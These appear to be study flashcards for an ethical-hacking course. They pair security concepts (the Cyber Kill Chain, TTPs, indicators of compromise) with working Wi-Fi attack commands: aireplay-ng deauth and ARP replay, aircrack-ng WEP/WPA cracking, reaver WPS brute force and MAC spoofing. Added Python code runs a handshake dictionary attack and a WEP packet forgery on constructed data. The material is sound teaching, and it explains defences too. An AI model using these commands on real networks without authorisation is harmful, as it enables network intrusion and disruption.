Module 1 - Introduction to Ethical Hacking
Elements of Information Security (EIS)
(Confidentiality -> Integrity -> Availability) -> Authenticity -> Non-repudiation
3. Close-in Attacks (Classification of Attacks)
- Performed when the attacker is in close physical proximity to the target system or network in order to gather, modify, or DISRUPT ACCESS to information
- Examples include social engineering such as eavesdropping, shoulder surfing, and dumpster diving
ARP Request Replay
1. Wait for an ARP packet and capture it
2. Replay (retransmit) it to the AP
3. The AP rebroadcasts it as a new encrypted packet with a new IV
4. Keep replaying until enough IVs have been collected to crack the key with aircrack-ng
Confidentiality (EIS)
Assurance that the information is accessible only to those AUTHORIZED TO HAVE ACCESS
1. Passive Attacks (Classification of Attacks)
- Do not tamper with the data; involve intercepting and MONITORING NETWORK TRAFFIC and data flow on the target network
- Examples include sniffing and eavesdropping
2. Active Attacks (Classification of Attacks)
- Tamper with data in transit or DISRUPT THE COMMUNICATION or services between systems to bypass or break into secured systems
- Examples include DoS, man-in-the-middle, session hijacking, and SQL injection
5. Distribution Attacks (Classification of Attacks)
- Attackers tamper with hardware or software prior to installation
- The tampering happens at the source (vendor) or while the product is in transit
4. Insider Attacks (Classification of Attacks)
- Using privileged access to VIOLATE RULES or intentionally cause a threat to the organization's information or information systems
- Examples include theft of physical devices and planting keyloggers, backdoors, and malware
Problem with WEP
The IV is sent to the router in plaintext, and 24 bits is not big enough: there are only about 16.7 million values, and by the birthday bound a repeat is expected after only a few thousand packets on a busy network (injection makes it faster). Statistical attacks based on these repeated and weak IVs recover the key; aircrack-ng is the tool for this
Defensive Information Warfare (PREPDAD)
Refers to all strategies and actions designed to defend against attacks on ICT assets: Prevention, Deterrence, Alerts, Detection, Emergency Preparedness, and Response
Techniques (TTPs)
TECHNICAL METHODS USED BY AN ATTACKER to achieve intermediate results during the attack. They include initial exploitation, setting up and maintaining command and control channels, accessing the target infrastructure, covering the tracks of data exfiltration, and others
1. Reconnaissance (CKC)
Gather data on the target to probe for weak points
5. Installation (CKC)
Install malware on the target system
ifconfig: ether
MAC address of the virtual interface
WPA vs WPA2
Nearly the same, but they use different encryption methods: WPA uses TKIP (still based on RC4) and WPA2 uses CCMP (based on AES)
Hacking Phase 1: Reconnaissance
Preparatory phase that gathers information about a target prior to launching an attack
More is learned about the target on a broad scale
Target range may include the organization's clients, employees, operations, network, and systems
define PRGA
Pseudo-Random Generation Algorithm: in RC4 (the cipher WEP uses), the phase that runs after the key-scheduling algorithm (KSA) and outputs the keystream bytes from the permuted state, one per byte of data. Its output is pseudorandom, fully determined by the key and IV, not truly random, which is why a repeated IV gives a repeated keystream
Cyber Kill Chain (CKC) (7 Steps) WACRIDE
Reconnaissance -> Weaponization -> Delivery -> Exploitation -> Installation -> Command and Control -> Actions on Objectives
Offensive Information Warfare (SWWMM)
Refers to information warfare that involves attacks against the ICT assets of an opponent: web application attacks, web server attacks, malware attacks, MITM attacks, system hacking
Authenticity (EIS)
Refers to the characteristic of a communication, document, or any data that ensures the QUALITY OF BEING GENUINE. Digital signatures fall in this category.
Launch packet sniffing
1. Put the NIC into monitor mode
2. airodump-ng wlan0 (or whatever your wireless card is called in iwconfig)
Columns explained:
ESSID - name of the network
BSSID - MAC address of the target network's access point
PWR - signal level; a higher value (closer to 0) means a stronger signal
Beacons - number of announcement frames the AP sent to broadcast its existence
#Data - number of data packets captured
#/s - number of data packets per second, measured over the last 10 seconds
CH - channel the network is working on
MB - maximum speed supported by the network
ENC - encryption used by the network (OPN means open)
CIPHER - cipher used by the encryption (e.g. WEP, TKIP, CCMP)
AUTH - authentication used (PSK is a pre-shared key)
3. airodump-ng --band abg wlan0 (a is 5 GHz, bg is 2.4 GHz)
Information Assurance Processes
1. Developing local policy, process, and guidance
2. Designing network and user authentication strategies
3. Identifying network vulnerabilities and threats
4. Identifying problem and resource requirements
5. Creating plans for identified resource requirements
6. Applying appropriate information assurance controls
7. Performing certification and accreditation
8. Providing information assurance training
Categories of Indicators of Compromise
1. Email Indicators 2. Network Indicators 3. Host-Based Indicators 4. Behavioral Indicators
Why change MAC addresses
1. Increase anonymity
2. Impersonate other devices
3. Bypass filters and connect to devices that only specific MACs are allowed to reach
Change MAC address linux cmds
1. ifconfig wlan0 down
2. ifconfig wlan0 hw ether 00:11:22:33:44:55
3. ifconfig wlan0 up
4. ifconfig (verify the ether field shows the new address)
The change lives only in kernel memory, so a reboot (or driver reload) restores the original burned-in MAC. The iproute2 equivalent of step 2 is ip link set dev wlan0 address 00:11:22:33:44:55
macchanger
1. ifconfig wlan0 down
2. macchanger -r wlan0 (assigns a fully random MAC)
3. ifconfig wlan0 up
handshake packets
The 4 EAPOL packets exchanged between a client and the router when the client connects. The handshake does not contain the key itself; it carries data (nonces and a MIC) that lets you check whether a candidate key is valid or not, which is what makes offline dictionary attacks possible
1. Monitor the target network (airodump-ng on the AP's channel, writing to a file)
2. Deauth a connected client so it reconnects and performs the handshake again
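The check described above, as an added example that is not part of these notes or of aircrack-ng's own code: the PMK is derived from the passphrase and SSID, the PTK from the PMK plus the two MACs and two nonces that are visible in the capture, and a candidate passphrase is right only if the MIC computed with the resulting KCK matches the MIC the client sent. The "capture" is constructed in code from a known passphrase; the MACs, nonces and EAPOL frame bytes are made-up values for the demo.

```python
# Added example (not part of the original notes): why a captured 4-way
# handshake lets you test passphrase guesses offline. The "capture" is
# constructed with a known passphrase; MACs, nonces and the EAPOL bytes
# are fake values for the demo.
import hashlib
import hmac
from dataclasses import dataclass
from typing import Iterable, Optional


@dataclass
class Handshake:
    ssid: str
    ap_mac: bytes      # from the address fields of the EAPOL frames
    sta_mac: bytes
    anonce: bytes      # sent by the AP in message 1
    snonce: bytes      # sent by the client in message 2
    eapol_msg2: bytes  # message 2 with its MIC field zeroed
    mic: bytes         # the MIC the client actually sent in message 2


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """WPA/WPA2-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 32 bytes).
    The 4096 rounds are what makes every guess cost something."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def derive_ptk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """802.11i PRF-512: PTK = PRF(PMK, "Pairwise key expansion",
    min(MACs) || max(MACs) || min(nonces) || max(nonces)).
    Everything except the PMK is visible in the captured handshake."""
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    out = b""
    for i in range(4):  # 4 x 20 bytes covers the 64 bytes needed
        out += hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:64]


def eapol_mic(kck: bytes, eapol_frame: bytes) -> bytes:
    """WPA2/CCMP MIC: HMAC-SHA1(KCK, EAPOL frame with MIC zeroed) truncated to
    16 bytes (WPA/TKIP uses HMAC-MD5 instead). KCK = first 16 bytes of the PTK."""
    return hmac.new(kck, eapol_frame, hashlib.sha1).digest()[:16]


def check_passphrase(passphrase: str, hs: Handshake) -> bool:
    """A guess is right iff the MIC we compute matches the MIC in the capture."""
    pmk = pmk_from_passphrase(passphrase, hs.ssid)
    kck = derive_ptk(pmk, hs.ap_mac, hs.sta_mac, hs.anonce, hs.snonce)[:16]
    return hmac.compare_digest(eapol_mic(kck, hs.eapol_msg2), hs.mic)


def dictionary_attack(hs: Handshake, wordlist: Iterable[str]) -> Optional[str]:
    """What aircrack-ng -w wordlist does: test each word against the handshake."""
    for word in wordlist:
        if check_passphrase(word, hs):
            return word
    return None


def constructed_capture(passphrase: str, ssid: str = "TestNet") -> Handshake:
    """Stand-in for airodump-ng's .cap file: the handshake a client using
    `passphrase` would have produced. Nonces, MACs and frame are fixed fakes."""
    ap_mac = bytes.fromhex("cc40d0c53893")
    sta_mac = bytes.fromhex("1e4d404fcd83")
    anonce = bytes(range(32))
    snonce = bytes(range(32, 64))
    eapol_msg2 = b"\x01\x03\x00\x75\x02\x01\x0a\x00" + bytes(113)  # fake msg 2, MIC zeroed
    pmk = pmk_from_passphrase(passphrase, ssid)
    kck = derive_ptk(pmk, ap_mac, sta_mac, anonce, snonce)[:16]
    return Handshake(ssid, ap_mac, sta_mac, anonce, snonce, eapol_msg2, eapol_mic(kck, eapol_msg2))


if __name__ == "__main__":
    hs = constructed_capture("correct horse")
    print(dictionary_attack(hs, ["password", "letmein", "correct horse", "qwerty"]))
```

Because the PMK depends on the SSID as well as the passphrase, precomputed tables only help for common network names, and each candidate still costs 4096 HMAC-SHA1 rounds; a long random passphrase is what defeats this, since nothing in the handshake can be inverted.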
Non-Repudiation
A GUARANTEE that the sender of a message cannot later deny having sent the message and that the recipient cannot deny having received the message
Information Warfare
Use of information and communication technologies (ICT) to gain competitive advantages over an opponent
Ethical Hackers will try to answer the following questions
1. What can an intruder see on the target system? (Recon and scanning)
2. What can an intruder do with that information? (Gaining and maintaining access)
3. Does anyone at the target organization notice the intruder's attempts or successes? (Recon and covering tracks)
4. Are all components of the information system adequately protected, updated, and patched?
5. How much time, effort, and money are required to obtain adequate protection?
6. Are the information security measures in compliance with legal and industry standards?
Black hat hackers avoid being noticed by using proxies and anonymizers
Gray Hats
Work both offensively and defensively at various times
Scan for WPS-enabled networks
wash --interface wlan0
How do hackers hack?
They try various tools and attack techniques to EXPLOIT VULNERABILITIES in a computer system or its security policy and controls in order to fulfill their motives
Cyber Kill Chain Methodology
Component of intelligence-driven defense for the identification and PREVENTION of MALICIOUS INTRUSION ACTIVITIES
What is hacking
Conducting footprinting/recon, creating a map of the infrastructure, identifying technologies in use, and identifying potential exploits and attack vectors
Exploiting system vulnerabilities and compromising security controls to gain unauthorized access to a system
Modifying system or application features to achieve a goal outside of the creator's original purpose
Stealing or redistributing intellectual property, leading to business loss
Korek Chop Chop Attack
Cracks WEP without needing many IVs; works even with a weak signal or little traffic
1. Recover the keystream of a captured packet one byte at a time: chop off the last byte, guess its value, fix up the ICV, and see whether the AP accepts the frame
2. Forge a new packet (typically an ARP request) with the recovered keystream
3. Inject it into the traffic to generate fresh IVs
6. Command and Control (CKC)
Create a command and control channel to communicate with the implant and pass data back and forth
2. Weaponization (CKC)
Create a deliverable malicious payload using an exploit and a backdoor
Reaver
Brute-forces the WPS PIN
reaver --bssid (ROUTER MAC) --channel 1 --interface wlan0 -vvv --no-associate
-vvv reveals as much information as possible
--no-associate stops reaver from associating itself (its association is buggy); keep the association alive with your own fakeauth instead
Run reaver first, then the fakeauth
Tactics (TTP)
Guidelines that describe the way an attacker performs an attack from beginning to end. They consist of the various tactics for information gathering, initial exploitation, privilege escalation, lateral movement, and deploying measures for persistent access to the system, among other purposes
Hacking Phase 4: Maintaining Access
Hacker retains ownership of the system
Attackers prevent the system from being owned by other attackers by securing exclusive access with backdoors, rootkits, or trojans
Attackers can upload, download, or manipulate data, applications, and configurations on the owned system
Attackers use the compromised system to launch further attacks
Hacking Phase 5: Clearing Tracks
Hiding malicious acts
Intentions include obtaining continued access to the victim's system, remaining unnoticed and uncaught, and deleting evidence that might lead to prosecution
Attacker overwrites the server, system, and application logs to avoid suspicion
Attackers always cover their tracks to hide their identity
Limitations of EH
Unless the business first knows what it is looking for and why it is hiring an EH, there is little to gain
An EH can only help the organization better understand its security posture; it is up to the organization to put the right safeguards on the network
Technical Skills of EH
In-depth knowledge of the major operating environments, i.e. Windows, Unix, Linux, and macOS
Knowledge of networking concepts, technologies, and related hardware and software
Computer expert adept at technical domains
Knowledge of security areas and related issues
High technical knowledge for launching sophisticated attacks
List of Adversary Behaviors
Internal reconnaissance
Use of PowerShell
Unspecified proxy activities
Use of command line interface
HTTP user agent
Command and control server
Use of DNS tunneling
Use of web shell
Data staging
Adversary Behavioral Identification
Involves the IDENTIFICATION OF COMMON METHODS or techniques followed by an adversary to launch attacks on or to penetrate an organization's network. Gives security professional insights into upcoming threats and exploits
Information Assurance
Making sure the integrity, availability, confidentiality, and authenticity of information and information systems are protected during the usage, processing, storage, and transmission of information
MAC Address
Media Access Control address: a physical address assigned to a network interface by its manufacturer and intended to be unique (no two interfaces should share one), although it can be overridden in software. An IP address identifies a device across networks and the internet; the MAC address identifies it within the local network (link layer)
Cyber terrorists
Motivated by religious or political beliefs to create fear through the large-scale disruption of computer networks
Attacks
Motive(Goal) + Method + Vulnerability
Tactics, Techniques, and Procedures (TTPs)
PATTERNS OF ACTIVITIES AND METHODS associated with specific threat actors or groups of threat actors
7. Actions on Objectives (CKC)
Perform actions to achieve the intended objectives/goals
Ethical Hacking
Defined by permission and intent
Use of hacking tools, tricks, and techniques to identify vulnerabilities and ensure system security
Focuses on simulating the techniques used by attackers to verify the existence of exploitable vulnerabilities in a system's security
Performs security assessments for an organization with the permission of the concerned authorities
Hacking Phase 3: Gaining Access
Point where the attacker obtains access to the operating system or applications on the target computer or network
Access can be gained at the operating system, application, or network level
Attacker can escalate privileges to obtain complete control of the system; in the process, intermediate systems are compromised as well
Examples are password cracking, buffer overflows, DoS, and session hijacking
Hacking Phase 2: Scanning
Pre-attack phase where the attacker scans the network for specific information based on what was gathered during recon
Use of dialers, port scanners, network mappers, ping tools, and vulnerability scanners
Extracts information such as live machines, ports, port status, OS details, device type, and system uptime to launch the attack
Reasons why organizations recruit ethical hackers
Prevent hackers from gaining access
Uncover vulnerabilities in systems and explore the potential security risk
Strengthen the organization's security posture: policies, network protection infrastructure, and end-user practices
Avoid security breaches
Safeguard customer data
Enhance security awareness at all levels
Procedures (TTPs)
Procedures are organizational approaches that threat actors follow to launch an attack. The number of actions usually differs depending on the objectives of the procedure and the threat actor group
Hacktivists
Promote a political agenda by hacking, especially by defacing or disabling websites
Cyber Kill Chain Insights
Provides insights into attack phases, which helps security professionals to understand the adversary's tactics, techniques, and procedures beforehand
3. Delivery (CKC)
Send weaponized bundle to the victim using email, USB, Etc.
What MAC info does a packet contain
Source MAC and destination MAC (in the frame header)
Motive
The TARGET SYSTEM STORES OR PROCESSES something valuable, and this leads to the threat of an attack on the system
Integrity (EIS)
The TRUSTWORTHINESS OF DATA OR RESOURCES in terms of preventing improper or unauthorized changes. Hashing algorithms fall in this category
Passive Recon
Acquiring information without directly interacting with the target, e.g. searching public records or news releases. Not detectable by the target
ARP packet
Address Resolution Protocol: a communication protocol used for discovering the link-layer (MAC) address that belongs to an IP address
Suicide Hackers
Aim to bring down the critical infrastructure for a "cause" and are not worried about facing jail terms
Why is Ethical Hacking Necessary
Allows for counter attacks against malicious hackers by anticipating the methods to break into a system
Availability (EIS)
Assurance that the systems responsible for delivering, storing, and processing information are accessible when REQUIRED BY THE AUTHORIZED USERS
Script Kiddies
Unskilled hacker who compromises a system by running scripts, tools and software that were developed by real hackers
White Hats
Use skills for defensive purposes and are also known as security analysts. They have permission from system owner
4. Behavioral Indicators
Used to identify specific behavior related to malicious activities and include a document executing a Powershell script and remote command execution.
1. Email Indicators (IOC)
Used to send malicious data to the target organization or individual such as senders email address, email subject, and attachments or links
2. Network Indicators (IOC)
Useful for command and control, malware delivery, identifying the operating system, and other tasks and include URLs, domain names, and IP addresses
Creating a wordlist
crunch [min] [max] [charset] -t [pattern] -o [filename]
Each @ in the pattern is replaced by every character of the charset; all other characters are kept literally. When -t is used, min and max must equal the length of the pattern
Example: crunch 6 6 123abc$ -t a@@@@b -o wordlist
Produces every 6-character word that starts with a and ends with b, with the middle 4 characters drawn from 123abc$ (7^4 = 2401 words)
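The pattern expansion crunch performs, as an added example written for these notes rather than taken from crunch: it only handles the @ placeholder drawn from a user-supplied charset (crunch also knows , for upper case, % for digits and ^ for symbols), and the pattern, charset and output path are the hypothetical values from the card above.

```python
# Added example (not crunch's own code): expand a crunch-style -t pattern.
# Every '@' is replaced by each character of the charset in turn; other
# characters are literal. Only '@' is implemented here; crunch's ',' '%'
# and '^' placeholders are left out.
from itertools import product
from typing import Iterator


def expand_pattern(pattern: str, charset: str) -> Iterator[str]:
    """Yield words in the same order crunch would: the rightmost '@' cycles fastest."""
    slots = [i for i, ch in enumerate(pattern) if ch == "@"]
    template = list(pattern)
    for combo in product(charset, repeat=len(slots)):
        for idx, ch in zip(slots, combo):
            template[idx] = ch
        yield "".join(template)


def wordlist_size(pattern: str, charset: str) -> int:
    """len(charset) ** (number of '@') - check this before writing to disk."""
    return len(charset) ** pattern.count("@")


def write_wordlist(pattern: str, charset: str, path: str) -> int:
    """Equivalent of -o: one word per line. Returns the number of words written."""
    n = 0
    with open(path, "w") as fh:
        for word in expand_pattern(pattern, charset):
            fh.write(word + "\n")
            n += 1
    return n


if __name__ == "__main__":
    # the card's example: crunch 6 6 123abc$ -t a@@@@b -o wordlist
    print(wordlist_size("a@@@@b", "123abc$"))  # 2401
    print(write_wordlist("a@@@@b", "123abc$", "wordlist"))
```

A duplicated character in the charset would produce duplicate words, so deduplicate the charset first if it comes from user input; the size function shows why a pattern with many @ slots and a large charset quickly becomes impractical.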
Steps to change to monitor mode
1. iwconfig (to check the current mode)
2. ifconfig wlan0 down
3. airmon-ng check kill (kills processes such as NetworkManager that would reset the card; this drops your internet connection, which is fine because pre-connection attacks do not need it)
4. iwconfig wlan0 mode monitor (or: iw dev wlan0 set type monitor)
5. ifconfig wlan0 up
6. iwconfig (confirm Mode:Monitor)
Arpreplay Attack command
aireplay-ng --arpreplay -b CC:40:D0:C5:38:93 -h 1E:4D:40:4F:CD:83 wlan0
-b is the target AP's MAC (BSSID); -h is the source MAC, i.e. your wireless adapter's MAC, which must already be associated with the AP (fakeauth) or the AP drops the replayed frames
Information Security
A state of well-being of information and infrastructure in which the possibility of THEFT, TAMPERING and DISRUPTION OF INFORMATION AND SERVICES is low or tolerable
Non-technical Skills of EH
Ability to learn and adopt new technology quickly
Strong work ethic and good problem-solving and communication skills
Committed to the organization's security policies
An awareness of local standards and laws
Indicators of Compromise
CLUES, ARTIFACTS and PIECES of FORENSIC DATA found on the network or operating systems of an organization that indicate intrusion or malicious activity on the organization's infrastructure. IOCs are not intelligence themselves but act as a good source of information about threats and serve as data points in the intelligence process. Security professionals need to PERFORM CONTINUOUS monitoring of IoCs to effectively and efficiently detect and respond to evolving cyber threats
Capturing packets within range
Can be done even if your MAC isnt the destination MAC. To do this, we change the operation of wireless interface to monitor mode. Default mode is managed which means it will only capture packets whose Destination MAC matches its own
Built in wireless cards drawbacks
Usually cannot support monitor mode or packet injection, so an external adapter with a supported chipset is needed for the wireless attacks in these notes
WEP Cracking
1. Capture a large number of packets/IVs (airodump-ng --bssid ... --write file on the AP's channel)
2. Analyze the captured IVs and crack the key (aircrack-ng)
Command: aircrack-ng file.cap
Result: it reveals the key once enough IVs are present; if it fails, keep capturing (or inject) and run it again
Active Recon
Directly interacting with the target by any means Youre detectable
State-Sponsored Hackers
Employed by governments to penetrate and gain top-secret information from, and do damage to, the information systems of other governments
ifconfig: eth0
Ethernet interface; present in the Kali VM because of the NAT network
Scope of EH
Ethical hacking is a crucial component of risk assessment, auditing, counter-fraud, and information systems security best practices
Used to identify risks and highlight remedial actions. It also reduces ICT costs by resolving vulnerabilities
4. Exploitation (CKC)
Exploit a vulnerability by executing code on the victim's system
Black Hats
Extraordinary computing skills resorting to malicious and destructive activities - crackers
Packet injection
Forcing the AP to generate new IVs (packets) so you can collect enough to crack the key. You must associate with the network first (fakeauth): association tells the AP you intend to communicate, and an AP drops frames from stations that are not associated. With WEP this works without knowing the password because open-system authentication does not check it
3. Host-Based Indicators (IOC)
Found by performing an analysis of the infected system with the organizational framework and include filenames, file hashes, registry keys, DLLs and mutex
What is WPS
Wi-Fi Protected Setup: a one-touch Wi-Fi setup protocol used by devices such as printers to join a network with an 8-digit PIN instead of the WPA passphrase. The last PIN digit is a checksum and the AP verifies the two halves separately (4 digits, then 3), so only about 11,000 guesses are needed, which is what reaver exploits
WEP Encryption
Wired Equivalent Privacy. Old encryption based on the RC4 stream cipher; cracked easily but still used on some networks
For each packet the sender picks a random 24-bit initialization vector (IV); RC4 is seeded with IV + key (the password) to produce a keystream; the keystream is XORed with the packet, turning readable data into ciphertext, and the receiver XORs with the same keystream to get the data back. The IV is sent in the clear so the receiver can regenerate the keystream
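The three WEP cards above (the IV problem, PRGA, and WEP encryption) plus the packet-injection and ChopChop cards describe one mechanism, so here is one added example that is not from the original notes: a toy WEP-style encryptor built on RC4 that shows that a repeated IV means a repeated keystream, that a known plaintext (an ARP request) hands the attacker the keystream, and that a recovered keystream plus its IV lets the attacker forge a packet without the key. The key, IV and packet contents are constructed for the demo, and the real WEP CRC-32 ICV is omitted.

```python
# Added example (not part of the original notes): toy WEP on RC4, to show
# why a 24-bit IV sent in the clear is fatal. Key, IVs and packets are
# made up for the demo; the CRC-32 ICV of real WEP is left out.
import math


def rc4_keystream(key: bytes, n: int) -> bytes:
    """RC4: key-scheduling algorithm (KSA), then the PRGA emits n keystream bytes."""
    s = list(range(256))
    j = 0
    for i in range(256):                      # KSA: permute state with the key
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(n):                        # PRGA: one pseudorandom byte per step
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def wep_encrypt(wep_key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """Per-packet RC4 key is IV || shared key; the 3-byte IV travels in the clear."""
    assert len(iv) == 3, "WEP IVs are 24 bits"
    ks = rc4_keystream(iv + wep_key, len(plaintext))
    return iv + bytes(p ^ k for p, k in zip(plaintext, ks))


def wep_decrypt(wep_key: bytes, packet: bytes) -> bytes:
    iv, body = packet[:3], packet[3:]
    ks = rc4_keystream(iv + wep_key, len(body))
    return bytes(c ^ k for c, k in zip(body, ks))


def recover_keystream(packet: bytes, known_plaintext: bytes) -> bytes:
    """Known-plaintext attack: keystream = ciphertext XOR plaintext.
    ARP requests are ideal because almost every byte of them is predictable."""
    return bytes(c ^ p for c, p in zip(packet[3:], known_plaintext))


def forge_packet(iv: bytes, keystream: bytes, new_plaintext: bytes) -> bytes:
    """Reuse a recovered keystream under its IV to encrypt a packet of our
    choosing without knowing the key: the basis of packet injection."""
    assert len(new_plaintext) <= len(keystream), "keystream too short for this payload"
    return iv + bytes(p ^ k for p, k in zip(new_plaintext, keystream))


def xor_of_plaintexts(pkt1: bytes, pkt2: bytes) -> bytes:
    """Two packets with the same IV share a keystream, so c1 XOR c2 == p1 XOR p2."""
    assert pkt1[:3] == pkt2[:3], "different IVs, so different keystreams"
    return bytes(a ^ b for a, b in zip(pkt1[3:], pkt2[3:]))


def expected_packets_before_iv_repeat(iv_bits: int = 24) -> float:
    """Birthday bound: a collision is expected after about sqrt(pi/2 * 2**bits) random IVs."""
    return math.sqrt(math.pi / 2 * 2 ** iv_bits)


if __name__ == "__main__":
    key = bytes.fromhex("0123456789")           # a 40-bit WEP key (constructed)
    iv = b"\x00\x00\x01"
    arp = b"ARP who-has 192.168.1.1 tell 192.168.1.7"
    captured = wep_encrypt(key, iv, arp)
    ks = recover_keystream(captured, arp)      # attacker never saw `key`
    forged = forge_packet(iv, ks, b"ARP who-has 192.168.1.1 tell 192.168.1.9")
    print(wep_decrypt(key, forged))
    print(round(expected_packets_before_iv_repeat()))  # about 5134 packets
```

The last number is why "24 bits is not big enough": even with perfectly random IVs a repeat is expected after roughly five thousand packets, and ARP replay lets the attacker generate that many in minutes. WPA2's CCMP avoids all of this with a 48-bit per-packet nonce that never repeats under one key and an authenticated cipher that rejects forged frames.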
deauth command
aireplay-ng --deauth 100000000 -a (ROUTER MAC) -c (TARGET MAC) wlan0
The number is how many deauth bursts to send (0 means keep sending); -a is the AP, -c the client to kick off. Without -c every client on the AP is deauthenticated via broadcast
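What that command actually puts on the air, as an added example that is not aireplay-ng's code: the raw 802.11 deauthentication frame, built and decoded with struct, plus a simple counter a defender can run over a capture to spot the burst a deauth attack produces. The MAC addresses and frame list are constructed for the demo; sending real frames needs a monitor-mode interface and raw socket access, which is what aireplay-ng provides.

```python
# Added example (not aireplay-ng's code): build/decode the 802.11 deauth
# frame that aireplay-ng --deauth spoofs, and count deauths per client to
# detect a flood. MACs and the frame list are constructed for the demo.
import struct
from collections import Counter
from typing import Dict, Iterable, List, Tuple

MGMT_TYPE = 0          # 802.11 frame type 0 = management
DEAUTH_SUBTYPE = 0x0C  # subtype 12 = deauthentication
REASON_CLASS3_FROM_NONASSOC_STA = 7  # the reason code aireplay-ng sends by default


def mac_bytes(mac: str) -> bytes:
    return bytes.fromhex(mac.replace(":", ""))


def mac_str(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def build_deauth(target_mac: str, ap_mac: str, seq: int = 0,
                 reason: int = REASON_CLASS3_FROM_NONASSOC_STA) -> bytes:
    """Deauth frame as if sent by the AP to `target_mac`: addr1 = destination
    (client), addr2 = source (spoofed AP), addr3 = BSSID. Nothing in the
    frame proves it came from the AP, which is why spoofing works."""
    fc = (DEAUTH_SUBTYPE << 4) | (MGMT_TYPE << 2)      # protocol version 0 -> 0xC0
    header = struct.pack("<BBH", fc, 0x00, 0)          # frame control, flags, duration
    header += mac_bytes(target_mac) + mac_bytes(ap_mac) + mac_bytes(ap_mac)
    header += struct.pack("<H", (seq & 0x0FFF) << 4)   # sequence number, fragment 0
    return header + struct.pack("<H", reason)          # body: 2-byte reason code


def is_deauth(frame: bytes) -> bool:
    fc = frame[0]
    return (fc >> 2) & 0x3 == MGMT_TYPE and (fc >> 4) & 0xF == DEAUTH_SUBTYPE


def parse_deauth(frame: bytes) -> Dict[str, object]:
    fc, _flags, _duration = struct.unpack_from("<BBH", frame, 0)
    (seq_ctrl,) = struct.unpack_from("<H", frame, 22)
    (reason,) = struct.unpack_from("<H", frame, 24)
    return {
        "type": (fc >> 2) & 0x3,
        "subtype": (fc >> 4) & 0xF,
        "da": mac_str(frame[4:10]),
        "sa": mac_str(frame[10:16]),
        "bssid": mac_str(frame[16:22]),
        "seq": seq_ctrl >> 4,
        "reason": reason,
    }


def deauth_counts(frames: Iterable[bytes]) -> Counter:
    """Deauth frames per (BSSID, destination). Legitimate deauths are rare;
    dozens to one client within seconds is the fingerprint of aireplay-ng."""
    counts: Counter = Counter()
    for f in frames:
        if is_deauth(f):
            p = parse_deauth(f)
            counts[(p["bssid"], p["da"])] += 1
    return counts


def flood_suspects(frames: Iterable[bytes], threshold: int = 10) -> List[Tuple[str, str]]:
    return [pair for pair, n in deauth_counts(frames).items() if n >= threshold]


if __name__ == "__main__":
    burst = [build_deauth("aa:bb:cc:dd:ee:ff", "00:11:22:33:44:55", seq=i) for i in range(64)]
    print(parse_deauth(burst[0]))
    print(flood_suspects(burst))
```

The reason the attack is so cheap is visible in build_deauth: the frame is 26 bytes with no MIC, so any station can claim to be the AP. Enabling 802.11w (Protected Management Frames, mandatory in WPA3) makes clients ignore deauth frames that are not protected by the session key, which stops this capture-the-handshake trick.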
Command to associate with a network
aireplay-ng --fakeauth 0 -a CC:40:D0:C5:38:93 -h 1E:4D:40:4F:CD:83 wlan0
-a is the AP's MAC; -h is your wireless adapter's MAC (get it from ifconfig); the 0 means authenticate and associate once
WPS attack
aireplay-ng --fakeauth 30 -a (ROUTER MAC) -h (YOUR ADAPTER MAC) wlan0
Re-sends the association every 30 seconds so it stays alive while reaver guesses PINs
Target Packet Sniffing Explained
airodump-ng --bssid 00:11:22:33:44: --channel 2 --write test wlan0
--bssid and --channel lock the capture to one AP; --write test saves it to files prefixed test (test-01.cap etc.) for aircrack-ng
Columns explained:
STATION - MAC of a client connected to (or probing for) the AP
Lost - data packets lost (gaps in the client's sequence numbers)
Frames - number of packets captured from that client
Probe - ESSIDs the client is probing for
ifconfig: wlan0
Your wireless adapter